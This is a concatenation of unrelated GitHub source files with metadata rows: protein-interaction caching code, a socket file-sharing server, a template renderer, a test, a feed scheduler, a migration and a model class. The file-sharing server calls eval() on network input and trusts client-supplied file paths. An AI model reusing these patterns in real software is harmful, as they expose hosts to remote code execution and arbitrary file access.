t=util.read_csv(fn, dtype={'gid_A':str, 'gid_B':str})
if "PHYSICAL" in s_db:
t=t[t.interaction_type_id==11].copy()
t.rename2({'gid_A':'Gene_A', 'gid_B':'Gene_B', 'tax_id_A':'tax_id'})
sw.check(f"data loaded from {fn}")
else:
if i_tax_id>0:
if "PHYSICAL" in s_db:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where tax_id_A=? and interaction_type_id=11", params=[i_tax_id])
else:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where tax_id_A=?", params=[i_tax_id])
else:
if "PHYSICAL" in s_db:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction where interaction_type_id=11")
else:
t=mydb.from_sql("SELECT gid_A Gene_A,gid_B Gene_B,interaction_type_id,score_physical,score_combined,tax_id_A tax_id,support from interaction")
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
if sum(t.Gene_A>t.Gene_B):
util.info_msg("Genes not order by str, canonicalize required!")
t=Network.canonicalize_table(t) # since we change type to str, we need to reorder it
data.append(t)
if len(data)==1:
t=data[0]
else:
t=pd.concat(data, ignore_index=True)
#sw.check("Canonicalized")
t['TYPE']='Direct'
sw.check("Start processing each tax_id")
S_tax_id=t.tax_id.unique()
for tax_id in S_tax_id:
#for tax_id,t_v in t.groupby('tax_id'):
#sw.check("ENTER GROUPBY")
if tax_id not in Cache.ppi_data['HISTORY']:
Cache.ppi_data['HISTORY'][tax_id]={}
Cache.ppi_node['HISTORY'][tax_id]={}
Cache.ppi_edge['HISTORY'][tax_id]={}
if "COMBINED" in s_db:
tmp=t.loc[t.tax_id==tax_id, ['Gene_A','Gene_B','TYPE','score_combined','support']].copy()
#sw.check("COPY")
tmp.rename2({'score_combined':'SCORE'})
data,t_node=Cache.df2data(tmp, con=mydb)
#sw.check("DICT")
Cache.ppi_data['HISTORY'][tax_id]["COMBINED_ALL"]=data
Cache.ppi_node['HISTORY'][tax_id]["COMBINED_ALL"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["COMBINED_ALL"]=tmp
#sw.check("Combined all")
tmp=tmp[tmp.SCORE>=Cache.CUTOFF_COMB].copy()
#sw.check("FILTER")
data,t_node=Cache.df2data(tmp, con=mydb)
#sw.check("DICT2")
Cache.ppi_data['HISTORY'][tax_id]["COMBINED_CORE"]=data
Cache.ppi_node['HISTORY'][tax_id]["COMBINED_CORE"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["COMBINED_CORE"]=tmp
#tmp=t_v[t_v.interaction_type_id==11]
tmp=t.loc[(t.tax_id==tax_id) & (t.interaction_type_id==11)]
tmp=tmp[['Gene_A','Gene_B','TYPE','score_physical','support']].copy()
tmp.rename2({'score_physical':'SCORE'})
#sw.check("Combined core")
data,t_node=Cache.df2data(tmp, con=mydb)
Cache.ppi_data['HISTORY'][tax_id]["PHYSICAL_ALL"]=data
Cache.ppi_node['HISTORY'][tax_id]["PHYSICAL_ALL"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["PHYSICAL_ALL"]=tmp
#sw.check("Physical all")
tmp=tmp[tmp.SCORE>=Cache.CUTOFF_COMB].copy()
data,t_node=Cache.df2data(tmp, con=mydb)
Cache.ppi_data['HISTORY'][tax_id]["PHYSICAL_CORE"]=data
Cache.ppi_node['HISTORY'][tax_id]["PHYSICAL_CORE"]=t_node
Cache.ppi_edge['HISTORY'][tax_id]["PHYSICAL_CORE"]=tmp
#sw.check("Physical core")
sw.check(f"processed :{tax_id}")
t=t.loc[t.tax_id!=tax_id]
return
S_DB=S_DB or Cache.get_DB(l_use_GPDB)
if tax_id is None:
util.error_msg('tax_id must be an int, or 0 means all supported species')
tax_id=abs(tax_id)
s_key=Cache.key(l_use_GPDB)
S_tax_id=[]
if not l_use_GPDB:
if tax_id not in (0,9606):
util.error_msg('Local database only supports human!')
tax_id=9606
if tax_id in Cache.ppi_data[s_key]:
S_DB=[x for x in S_DB if x not in Cache.ppi_data[s_key][tax_id]]
if len(S_DB)==0: return
S_tax_id=[tax_id]
T=[]
for filename in S_DB:
print("loading PPI database: "+filename+" ...")
if os.path.isfile(filename):
t=pd.read_csv(filename)
t['ds']=filename
T.append(t)
elif os.path.isfile(Cache.DATA_DIR+filename+".csv"):
t=pd.read_csv(Cache.DATA_DIR+filename+".csv")
t['ds']=filename
T.append(t)
else:
util.warn_msg('PPI database ' + filename + ' not found.')
if len(T)>1:
t=pd.concat(T, axis=0, ignore_index=True)
else:
t=T[0]
t=t[(t.Gene_A!=t.Gene_B) & (t.Score>=0.5)].copy()
eg=entrez
if eg is None:
eg=ez.EntrezGene(tax_id=tax_id)
else:
eg.load_organism(tax_id=tax_id)
c_seen={}
t.index=list(range(len(t)))
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
S_gene_A=t.Gene_A.tolist()
S_gene_B=t.Gene_B.tolist()
for i in range(len(t)):
gene_A=S_gene_A[i]
gene_B=S_gene_B[i]
if gene_A not in c_seen:
c_seen[gene_A]=eg.fix_gene_id(gene_A)
S_gene_A[i]=c_seen[gene_A]
if S_gene_A[i] is None: continue
if gene_B not in c_seen:
c_seen[gene_B]=eg.fix_gene_id(gene_B)
S_gene_B[i]=c_seen[gene_B]
t['Gene_A']=S_gene_A
t['Gene_B']=S_gene_B
t=t[~(t.Gene_A.isnull() | t.Gene_B.isnull())].copy()
t.index=list(range(len(t)))
t['tax_id']=tax_id
else:
mydb=db.DB('METASCAPE')
if tax_id>0 and tax_id in Cache.ppi_data[s_key]:
S_DB=[x for x in S_DB if x not in Cache.ppi_data[s_key][tax_id]]
if len(S_DB)==0: return
if tax_id>0:
print("loading PPI database from database for tax_id: %d ..." % tax_id)
t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and tax_id_A=? and ds in (", ")", S_DB, params_before=[tax_id])
S_tax_id=[tax_id]
else:
#ZZZ modify in the future, to obtain the list of all supported tax_id
t=mydb.from_sql('SELECT DISTINCT tax_id FROM gid2source_id')
S_tax_id=[x for x in t.tax_id.astype(int).tolist() if x not in Cache.ppi_data[s_key]]
if len(S_tax_id):
s_tax_id=",".join(util.iarray2sarray(S_tax_id))
print("loading PPI database for tax_id: %s ..." % s_tax_id)
t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and ds in (", ")", S_DB)
#t=mydb.sql_in("SELECT gid_A Gene_A,gid_B Gene_B,0 Score,tax_id_A tax_id,ds from interaction where interaction_category!='genetic' and gid_A!=gid_B and tax_id_A=tax_id_B and tax_id_A in ("+s_tax_id+") and ds in (", ")", S_DB)
else:
t=pd.DataFrame()
if len(t):
t['Gene_A']=t.Gene_A.astype(str)
t['Gene_B']=t.Gene_B.astype(str)
if sum(t.Gene_A>t.Gene_B):
t=Network.canonicalize_table(t) # since we change type to str, we need to reorder it
for x in S_tax_id:
#print ">>>>>>>>>>>>>>>>>>>>>>>", x
if x not in Cache.ppi_data[s_key]:
Cache.ppi_data[s_key][x]={}
Cache.ppi_node[s_key][x]={}
for y in S_DB:
Cache.ppi_data[s_key][x][y]={}
Cache.ppi_node[s_key][x][y]=pd.DataFrame()
if len(t)==0: return
for k,t_v in t.groupby(['tax_id','ds']):
#print ">>>", k, len(t_v)
#t_v=t_v.copy()
if k[0] not in S_tax_id: continue
data={}
t_node=None
#t_v=t_v.copy()
#t_v.index=list(range(len(t_v)))
#for i in t_v.index:
#if i%1000==0: print i
for row in t_v.itertuples():
gene_A=row.Gene_A #t_v.ix[i,'Gene_A']
gene_B=row.Gene_B #t_v.ix[i,'Gene_B']
score=row.Score #t_v.ix[i,'Score']
if gene_A not in data:
data[gene_A]={gene_B:score}
else:
data[gene_A][gene_B]=max(score, data[gene_A].get(gene_B,0))
if gene_B not in data:
data[gene_B]={gene_A:score}
else:
data[gene_B][gene_A]=max(score, data[gene_B].get(gene_A,0))
Cache.ppi_data[s_key][k[0]][k[1]]=data
S_gene=list(data.keys())
if l_use_GPDB:
t_node=Cache.gene2node(S_gene, con=mydb)
else:
t_node=eg.gene_sarray_to_table(S_gene, l_description=False)
Cache.ppi_node[s_key][k[0]][k[1]]=t_node
# YZHOU: for InWeb_IM, their web GUI uses a threshold for score
#From: Rasmus Borup Hansen [mailto:rbh@intomics.com]
#Sent: Friday, February 03, 2017 4:22 AM
#Subject: Re: Interaction not shown in InBio Map
#
#To make a long story short: We've tried a number of different strategies for choosing a cutoff, and right now the web interface uses 0.156.
#
#Best,
#
#Rasmus
class PPI(Network):
    # Thin Network subclass: materialises the module-level Cache's
    # protein-protein interaction data for a single species.
    def __init__(self, tax_id=9606, l_use_GPDB=False, S_DB=None):
        """tax_id is None, defaults to 9606, if 0, means load all species
        Warning: S_DB is set in Cache.load(), so preload Cache if you want to use different database"""
        self.tax_id=tax_id
        # Cache.get supplies the interaction data, the node table and a premade edge table.
        data, t_node, t_edge=Cache.get(tax_id=tax_id, l_use_GPDB=l_use_GPDB, S_DB=S_DB)
        print("PPI databases loaded")
        # skip_copy=True hands the cached structures over without deep-copying them.
        super(PPI, self).__init__(data, T_node=t_node, name='proteome', premade_T_edge=t_edge, skip_copy=True)
# Ad-hoc smoke-test / benchmarking harness.  The early exit() calls make
# everything after the first exit() unreachable; it is kept as developer
# scratch code.
if __name__=="__main__":
    #Cache.load(tax_id=9606, S_DB='PHYSICAL_CORE')
    #Cache.load(tax_id=9606, S_DB='COMBINED_CORE')
    sw=util.StopWatch()
    Cache.load(tax_id=9606, S_DB='COMBINED_CORE')
    Cache.info()
    sw.check('Loaded')
    #Cache.load(tax_id=0, l_use_GPDB=True)
    #Cache.load(tax_id=0, S_DB=['BioGrid','GeneGO'], l_use_GPDB=True)
    #Cache.info()
    #exit()
    ppi=PPI(l_use_GPDB=True, tax_id=9606)
    sw.check('Ready')
    exit()
    # --- unreachable below this point ---
    ppi=PPI(l_use_GPDB=True, tax_id=9606)
    print(list(Cache.ppi_data['GPDB'].keys()))
    #ppi.T_node.to_csv('t1.csv')
    #ppi.T_edge.to_csv('t2.csv')
    print(ppi.data['132884'])
    S_node=['132884','191','537']
    test=ppi.subnetwork(S_node)
    print(test.nof_nodes())
    exit()
    ## example
    S_node=util.read_list('~/RM_Hits.txt')
    test=ppi.subnetwork(S_node)
    test.to_xgmml('RM_.xgmml')
    exit()
    S_node=util.read_list('~/CM_Hits.txt')
    test=ppi.subnetwork(S_node)
    test.to_xgmml('CM_.xgmml')
    exit()
    #print ppi.T_node[:5]
    #print ppi.T_edge[:5]
    test=ppi.subnetwork(S_node)
    #print test
    exit()
    # NOTE(review): `net` is never defined in this file's visible scope; this
    # dead branch would raise NameError if ever reached.
    mc=MCODE(net)
    #print mc.C_nodeByScore
    mc.params['hairCut']=True
    c=mc.find_clusters(True, True)
    print(mc.to_MCODE_table(c))
    for i,cp in enumerate(c):
        print(">>> Rank "+str(i)+" <<<")
        cp.to_xgmml('out/test'+str(i))
        S=cp.nodes()
        for node in S:
            nodeInfo=mc.C_nodeInfo[node]
            print("Node=> "+node)
            print(nodeInfo)
| data2code/msbio | ppi.py | ppi.py | py | 39,228 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "util.error_msg",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "util.error_msg",
"line_... |
11714358376 | import Server
import os
import socket
import threading
from tkinter import *
from tkinter import filedialog, messagebox
import customtkinter as ctk
from CTkListbox import *
import PIL.Image
import PIL.ImageTk
from Server import *
SIZE = 1024  # bytes per socket send/recv chunk
FORMAT = "utf-8"  # text encoding for control messages
PORT = 4000  # TCP port the host server listens on
# connFlag[0]: folder changed -> push a file-list update; connFlag[1]: connected-client count
connFlag = [False, 0]
def serverLogWindow(frame, main_window, folderpath):
    """Run the file-share host: accept TCP clients, serve DOWNLOAD/UPLOAD/DELETE
    commands against `folderpath`, and render a live log UI into `frame`.

    `main_window` is the callback used to rebuild the main screen when the
    server is shut down.
    """
    # l=[f for f in os.listdir(folderpath) if os.path.isfile(os.path.join(folderpath, f))]
    l = []
    IP = socket.gethostbyname(socket.gethostname() + ".local")
    ADDR = (IP, PORT)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(ADDR)
    sock.listen()
    devicesConnectedVar = StringVar()
    devicesConnectedVar.set(f"Devices connected:{connFlag[1]}")
    serverLogs = []
    serverLogsVar = Variable(value=str(serverLogs))
    serverLogs.append("[STARTING] Server is starting...")
    serverLogsVar.set(str(serverLogs))
    print("Waiting for connection...")
    print(f"Share this code: {IP}")
    # Poll the shared folder; push a fresh file list to the client whenever it
    # changes (or when connFlag[0] forces a refresh after an upload/delete).
    def checkChanges(server, addr):
        l = []
        while True:
            new_l = [
                f
                for f in os.listdir(folderpath)
                if os.path.isfile(os.path.join(folderpath, f))
            ]
            if connFlag[0] == True or l != new_l:
                l = new_l
                msg = f"UPDATE%{str(new_l)}"
                # print(msg)
                server.send(convertToSIZE(msg))
                connFlag[0] = False
    # Accept loop: each accepted socket is handed to serverConnected.
    def serverHandler():
        while True:
            conn, addr = sock.accept()
            if conn:
                serverConnected(conn, addr)
    # Greet a new client, start its command handler and its change-watcher thread.
    def serverConnected(conn, addr):
        global server
        server = conn
        msg = "[NEW CLIENT] : HOST"
        # server.send(convertToSIZE(msg.encode(FORMAT)))
        server.send(msg.encode(FORMAT))
        serverLogs.append(f"[NEW CONNECTION]: {addr} Connected")
        serverLogsVar.set(str(serverLogs))
        clientThread = threading.Thread(target=clientHandlerHost, args=(server, addr))
        clientThread.start()
        connFlag[1] += 1
        devicesConnectedVar.set(f"Devices connected:{connFlag[1]}")
        # if connFlag[1] == 1:
        checkChangeThread = threading.Thread(target=checkChanges, args=(server, addr))
        checkChangeThread.start()
    # Per-client command loop.  Protocol: "<CMD>%<payload>" messages padded to
    # SIZE bytes; file bodies are streamed in SIZE-byte chunks.
    def clientHandlerHost(server, addr):
        new_l = [
            f
            for f in os.listdir(folderpath)
            if os.path.isfile(os.path.join(folderpath, f))
        ]
        msg = f"UPDATE%{str(new_l)}"
        server.send(convertToSIZE(msg))
        while True:
            msg = server.recv(SIZE)
            if not msg:
                continue
            else:
                msg = removeExtraBytes(msg).decode(FORMAT)
                cmd, msg = msg.split("%")
                if cmd == "DOWNLOAD":
                    filename = msg
                    filepath = os.path.join(folderpath, filename)
                    packetCount = getPacketCount(filepath)
                    # NOTE(review): "(unknown)" looks like a redacted filename
                    # placeholder -- confirm what the client expects here.
                    fileData = f'["(unknown)", "{packetCount}"]'
                    msgSend = f"TAKE_DATA%{fileData}"
                    server.send(convertToSIZE(msgSend))
                    with open(filepath, "rb") as f:
                        while packetCount > 0:
                            data = f.read(SIZE)
                            server.send(data)
                            packetCount -= 1
                    serverLogs.append(f"[DOWNLOADED]: (unknown) downloaded by {addr}")
                    serverLogsVar.set(str(serverLogs))
                elif cmd == "UPLOAD":
                    filename = msg
                    filepath = os.path.join(folderpath, filename).replace("\\", "/")
                    # SECURITY: eval() of data received from the network is
                    # dangerous -- consider int()/json parsing instead.
                    packetCountResponse = eval(
                        removeExtraBytes(server.recv(SIZE)).decode(FORMAT)
                    )
                    with open(filepath, "wb") as f:
                        while packetCountResponse > 0:
                            data = server.recv(SIZE)
                            f.write(data)
                            packetCountResponse -= 1
                    connFlag[0] = True
                    serverLogs.append(f"[UPLOADED]: (unknown) uploaded by {addr}")
                    serverLogsVar.set(str(serverLogs))
                elif cmd == "DELETE":
                    filename = msg
                    filepath = os.path.join(folderpath, filename).replace("\\", "/")
                    os.remove(filepath)
                    connFlag[0] = True
                    serverLogs.append(f"[DELETED]: (unknown) deleted by {addr}")
                    serverLogsVar.set(str(serverLogs))
    # Tear down the log view and return to the main screen.
    def shutDownServerButton():
        frame.destroy()
        main_window()
    serverThread = threading.Thread(target=serverHandler)
    serverThread.start()
    # --- UI layout ---
    lb1 = ctk.CTkLabel(
        frame,
        text="SERVER LOGS",
        font=("Comic Sans MS bold", 20),
        padx=5,
        pady=5,
    )
    lb1.pack()
    lb2 = ctk.CTkLabel(
        frame,
        text=f"Share this code to join: {IP}",
        font=("Comic Sans MS bold", 18),
        padx=5,
        pady=5,
    )
    lb2.place(x=10, y=50)
    lb3 = ctk.CTkLabel(
        frame,
        textvariable=devicesConnectedVar,
        font=("Comic Sans MS bold", 18),
        padx=5,
        pady=5,
    )
    lb3.place(x=790, y=50)
    listbox1 = CTkListbox(frame, listvariable=serverLogsVar, height=400, width=950)
    listbox1.place(x=10, y=100)
    btn1 = ctk.CTkButton(frame, text="Shut Down Server", command=shutDownServerButton)
    btn1.place(x=450, y=550)
| Aryan51203/File-Transfer | hostServer.py | hostServer.py | py | 5,609 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "socket.gethostbyname",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "socket.gethostname",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "socket.socket",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "socket.AF_INET"... |
23096307798 | from jinja2 import Template
# Render the leading fields of each weather.log line into weather.html
# via the Jinja2 template stored in weth.txt.
# FIX: the original opened files without closing them reliably
# (open('weth.txt').read() leaked a handle); use context managers.
with open('weather.log', 'r') as f:
    w = f.readlines()

# Each row: whitespace-separated fields from the first 25 characters of a line.
weather = [line[:25].strip().split() for line in w]
#print(weather)

with open('weth.txt') as f:
    html = f.read()

template = Template(html)
render = template.render(weather=weather)

with open('weather.html', 'w') as f:
    f.write(render)
| AnnPython/-jinja | weth1.py | weth1.py | py | 360 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "jinja2.Template",
"line_number": 13,
"usage_type": "call"
}
] |
26807889190 | import os
import sys
import numpy as np
import pytest
from numpy.random import normal
sys.path.append(os.path.join(os.path.dirname(__file__), "../.."))
module = __import__("Acquisition", fromlist=["EI"])
class TestEI:
    """Checks the analytic Expected Improvement value against a Monte Carlo estimate."""
    @pytest.mark.parametrize(
        ("mean", "var", "base"),
        [(0.0, 1.0, 0.5), (0.8, 0.1, 0.3), (0.1, 1.3, 0.7), (0.4, 0.1, 0.3),],
    )
    def test_f(self, mean, var, base) -> None:
        # Exact (closed-form) solution
        AF = module.EI.EI()
        ei = AF.f(mean, var, base)
        # Approximate solution (Monte Carlo integration)
        # NOTE(review): np.random.normal's second argument is the standard
        # deviation, not the variance -- confirm `var` is meant as sigma here.
        sum = 0.0
        size = 100000
        for x in normal(mean, var, size):
            sum += np.max([base - x, 0.0])
        sum /= size
        print(sum, ei)
        # Absolute difference between exact and sampled estimates
        dif = np.abs(sum - ei)
        assert dif < 0.1
| mit17024317/2020-0730 | Optimizer/Search/Acquisition/test/test_EI.py | test_EI.py | py | 790 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
17360305125 | """empty message
Revision ID: d21d3839c096
Revises: 0c6b29c57638
Create Date: 2020-01-08 12:54:10.048577
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd21d3839c096'
down_revision = '0c6b29c57638'
branch_labels = None
depends_on = None
def upgrade():
    """Create the word_classification table and its lookup indexes."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('word_classification',
    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
    sa.Column('word_classification', sa.String(length=4), nullable=False),
    sa.Column('word', sa.String(length=1024), nullable=False),
    sa.Column('last_name_used', sa.String(length=1024), nullable=True),
    sa.Column('last_prep_name', sa.String(length=1024), nullable=True),
    sa.Column('frequency', sa.BIGINT(), nullable=True),
    sa.Column('approved_by', sa.Integer(), nullable=True),
    sa.Column('approved_dt', sa.DateTime(timezone=True), nullable=True),
    sa.Column('start_dt', sa.DateTime(timezone=True), nullable=True),
    sa.Column('end_dt', sa.DateTime(timezone=True), nullable=True),
    sa.Column('last_updated_by', sa.Integer(), nullable=True),
    sa.Column('last_update_dt', sa.DateTime(timezone=True), nullable=True),
    sa.ForeignKeyConstraint(['approved_by'], ['users.id'], ),
    sa.ForeignKeyConstraint(['last_updated_by'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    op.create_index(op.f('ix_word_classification_word'), 'word_classification', ['word'], unique=False)
    op.create_index(op.f('ix_word_classification_word_classification'), 'word_classification', ['word_classification'], unique=False)
    # ### end Alembic commands ###
def downgrade():
    """Drop the word_classification table and its indexes (reverse of upgrade)."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_word_classification_word_classification'), table_name='word_classification')
    op.drop_index(op.f('ix_word_classification_word'), table_name='word_classification')
    op.drop_table('word_classification')
    # ### end Alembic commands ###
| bcgov/namex | api/migrations/versions/d21d3839c096_.py | d21d3839c096_.py | py | 2,035 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "alembic.op.create_table",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integ... |
14149292573 | import sys
sys.path.insert(0,'python')
from geo_trans import *
import numpy as np
from scipy.interpolate import griddata
from fast_rw import *
def get_coords(h, v):
    """Locate Sentinel-2 MGRS tile '50SMG' pixels inside MODIS tile (h, v).

    Returns (index, Scoords): `index` holds the row/col positions within the
    2400x2400 MODIS grid whose MGRS zone is '50SMG'; `Scoords` holds the
    matching Sentinel coordinates (row axis flipped via 9999 - northing).
    """
    # BUG FIX: the original hard-coded get_lon_lat(27, 5) and ignored the
    # h/v arguments entirely.
    mgrss = get_lon_lat(h, v).ravel()
    # Split each MGRS string into (zone id, easting digits, northing digits).
    mgrss = np.array([(i[:5],i[-8:-4],i[-4:]) for i in mgrss]).reshape(2400,2400,3)
    index = np.where(mgrss[:,:,0]=='50SMG')
    Scoords = [9999-mgrss[index[0], index[1],2].astype('int'), mgrss[index[0], index[1],1].astype('int')]
    return index, Scoords
# Resample the 2400x2400 MODIS grid onto the 10980x10980 Sentinel-2 grid
# with nearest-neighbour interpolation over the 50SMG tile pixels.
h=27; v=5
Rs = np.arange(2400*2400).reshape(2400,2400)
grid_x, grid_y = np.mgrid[0:10980, 0:10980]
index, Scoords = get_coords(h,v)
values = Rs[index[0],index[1]]
# NOTE(review): np.array(zip(...)) only produces a 2-D array under Python 2;
# under Python 3 it yields a 0-d object array -- confirm target interpreter.
std_int_sent = griddata(np.array(zip(Scoords[0],Scoords[1])), values, (grid_x, grid_y), method='nearest')
# NOTE(review): '%i' in the pickle name is a format placeholder that is never
# filled in -- confirm whether a tile index was meant to be interpolated here.
parallel_rw_pkl(std_int_sent, 'std_int_sent%i', 'w')
| MarcYin/S2_MODIS | scripts/standard_mask.py | standard_mask.py | py | 792 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.where",
"line_numbe... |
53079157 | __author__ = 'James DeVincentis <james.d@hexhost.net>'
import os
import multiprocessing
import time
import schedule
import setproctitle
import cif
class Feeder(multiprocessing.Process):
    """Background process that discovers feed config files and runs the
    resulting feed jobs on a `schedule`-library schedule."""

    def __init__(self):
        multiprocessing.Process.__init__(self)
        self.backend = None
        self.logging = cif.logging.getLogger('FEEDER')
        self.logging.info("Loading Feeds")
        self.load_feeds()

    def load_feeds(self):
        """Discover *.yml files in the feed directory and schedule each feed.

        Feeds without an "interval" key are left unscheduled; an unrecognized
        interval value falls back to running every minute.
        """
        schedule.clear()
        feeds = {}
        self.logging.debug("Getting List of Feeds")
        files = os.listdir(cif.options.feed_directory)
        feed_files = []
        for file in files:
            if file.endswith(".yml"):
                self.logging.debug("Found Feed File: {0}".format(file))
                feed_files.append(os.path.join(cif.options.feed_directory, file))
        feed_files.sort()
        for feed_file in feed_files:
            self.logging.info("Loading Feed File: {0}".format(feed_file))
            feeds[feed_file] = cif.feeder.Feed(feed_file)
            self.logging.info("Scheduling Feed File: {0}".format(feed_file))
            if 'feeds' not in feeds[feed_file].feed_config:
                self.logging.info("{0} does not contain feeds key".format(feed_file))
                continue
            for feed_name in feeds[feed_file].feed_config['feeds']:
                feed_config = feeds[feed_file].feed_config['feeds'][feed_name]
                if "interval" in feed_config:
                    if feed_config['interval'] == "hourly":
                        self.logging.info(repr(schedule.every().hour.at("00:00").do(feeds[feed_file].process, feed_name)))
                    elif feed_config['interval'] == "daily":
                        self.logging.info(repr(schedule.every().day.at("00:00").do(feeds[feed_file].process, feed_name)))
                    elif feed_config['interval'] == "weekly":
                        # BUG FIX: "weekly" feeds were scheduled with every().day,
                        # so they actually ran once a day.  Run every 7 days instead.
                        self.logging.info(repr(schedule.every(7).days.at("00:00").do(feeds[feed_file].process, feed_name)))
                    else:
                        self.logging.info(repr(schedule.every(1).minute.do(feeds[feed_file].process, feed_name)))

    def run(self):
        """Process entry point: tag the process title, then run due jobs forever."""
        try:
            setproctitle.setproctitle('[CIF-SERVER] - Feeder')
        except Exception:
            # setproctitle is best-effort; ignore platforms where it is unavailable.
            pass
        while True:
            try:
                schedule.run_pending()
                time.sleep(1)
            except Exception as e:
                # Keep the feeder alive, but log the actual failure instead of
                # a generic message with the exception discarded.
                self.logging.error("Schedule dead, restarting: {0}".format(e))
                continue
| Danko90/cifpy3 | lib/cif/feeder/feeder.py | feeder.py | py | 2,614 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "multiprocessing.Process",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "multiprocessing.Process.__init__",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
"line_number": 15,
"usage_type": "attribute"
},... |
5863215541 | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from ..models.share_credential import ShareCredential
from ..types import UNSET, Unset
T = TypeVar("T", bound="ModifyRepositoryProfileRequest")
@attr.s(auto_attribs=True)
class ModifyRepositoryProfileRequest:
    """Model having repository details

    Attributes:
        profile_name (Union[Unset, str]): name of the repository profile
        description (Union[Unset, str]): optional free-text description of the profile
        share_path (Union[Unset, str]): Provide the share path of catalog
        modified_by (Union[Unset, str]): Provide the modifiedby user
        share_credential (Union[Unset, ShareCredential]): Share credential details
    """
    profile_name: Union[Unset, str] = UNSET
    description: Union[Unset, str] = UNSET
    share_path: Union[Unset, str] = UNSET
    modified_by: Union[Unset, str] = UNSET
    share_credential: Union[Unset, ShareCredential] = UNSET
    # Catch-all for fields the API returns that this model does not declare.
    additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a camelCase JSON-ready dict, omitting UNSET fields."""
        profile_name = self.profile_name
        description = self.description
        share_path = self.share_path
        modified_by = self.modified_by
        share_credential: Union[Unset, Dict[str, Any]] = UNSET
        if not isinstance(self.share_credential, Unset):
            share_credential = self.share_credential.to_dict()
        field_dict: Dict[str, Any] = {}
        field_dict.update(self.additional_properties)
        field_dict.update({})
        if profile_name is not UNSET:
            field_dict["profileName"] = profile_name
        if description is not UNSET:
            field_dict["description"] = description
        if share_path is not UNSET:
            field_dict["sharePath"] = share_path
        if modified_by is not UNSET:
            field_dict["modifiedBy"] = modified_by
        if share_credential is not UNSET:
            field_dict["shareCredential"] = share_credential
        return field_dict
    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build an instance from a camelCase dict; unknown keys are kept in
        additional_properties."""
        d = src_dict.copy()
        profile_name = d.pop("profileName", UNSET)
        description = d.pop("description", UNSET)
        share_path = d.pop("sharePath", UNSET)
        modified_by = d.pop("modifiedBy", UNSET)
        _share_credential = d.pop("shareCredential", UNSET)
        share_credential: Union[Unset, ShareCredential]
        if isinstance(_share_credential, Unset):
            share_credential = UNSET
        else:
            share_credential = ShareCredential.from_dict(_share_credential)
        modify_repository_profile_request = cls(
            profile_name=profile_name,
            description=description,
            share_path=share_path,
            modified_by=modified_by,
            share_credential=share_credential,
        )
        modify_repository_profile_request.additional_properties = d
        return modify_repository_profile_request
    @property
    def additional_keys(self) -> List[str]:
        return list(self.additional_properties.keys())
    def __getitem__(self, key: str) -> Any:
        return self.additional_properties[key]
    def __setitem__(self, key: str, value: Any) -> None:
        self.additional_properties[key] = value
    def __delitem__(self, key: str) -> None:
        del self.additional_properties[key]
    def __contains__(self, key: str) -> bool:
        return key in self.additional_properties
| dell/omivv | Python/omevv/v1/omevv_apis_client/models/modify_repository_profile_request.py | modify_repository_profile_request.py | py | 3,461 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "typing.TypeVar",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "typing.Union",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "types.Unset",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "types.UNSET",
"line_number... |
11572477017 | from collections import deque
import heapq  # local import: the file's fused top import line is outside this block

